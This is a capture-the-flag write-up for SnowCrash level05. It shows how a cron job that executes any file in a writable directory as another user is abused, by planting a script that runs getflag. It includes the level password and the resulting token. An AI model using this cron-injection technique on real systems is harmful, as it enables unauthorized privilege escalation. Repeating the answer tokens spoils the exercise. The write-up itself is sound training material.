| .. | ||
| flag | ||
| passwd | ||
| README.md | ||
Level 05
how to login
username: level05
password: ne2searoevaevoem4ov4ar8ap
Goal
run getflag as user flag05
Actually doing something
level05@snowcrash.local.maix.me's password:
You have new mail.
level05@SnowCrash:~$
This is weird, the only mail I have is my chain mail !
Jokes aside, looking at the files in the user's home, there is nothing other than the default ones.
This reeks of old program though. Nobody check mails directly when they login like this.
From my times on wikipedia not working I know that /var/mail sometimes exists, lets check it
level05@SnowCrash:~$ ll /var/mail/level05
-rw-r--r--+ 1 root mail 58 Jan 19 13:44 /var/mail/level05
level05@SnowCrash:~$ cat /var/mail/level05
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
Oh wow, this looks like a nice cronjob
if we decipher the old text, we get something like this:
Every two minutes (0, 2, 4, etc...) run the command
su -c "sh /usr/sbin/openarenaserver" - flag05
so su -c "text" means "please run text as X" and the - flag05 means "use as flag05 and not root as your user"
so this runs /usr/sbin/openarenaserver every two minutes as the user flag05
lets read that script
level05@SnowCrash:~$ cat /usr/sbin/openarenaserver
#!/bin/sh
for i in /opt/openarenaserver/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
It looks like it runs the files present in /opt/openarenaserver with a limit of 5s (cpu time) per process, and then remove that file
lets try to add a little script there (like say something that dumps the output of getflag to elsewhere?)
``level05@SnowCrash:~$ cat <<EOF >/tmp/getflag05
> #!/bin/sh
> getflag >/tmp/flag05
> chmod +r /tmp/flag05
> EOF
level05@SnowCrash:~$ chmod a+rx /tmp/getflag05
level05@SnowCrash:~$ ln -s /tmp/getflag05 /opt/openarenaserver/flag
level05@SnowCrash:~$ sleep 120 && cat /tmp/flag05
Check flag.Here is your token : viuaaale9huek52boumoomioc
And voila ! We had to write the result to another file since otherwise the data would be lost to the ether (crontab stdio)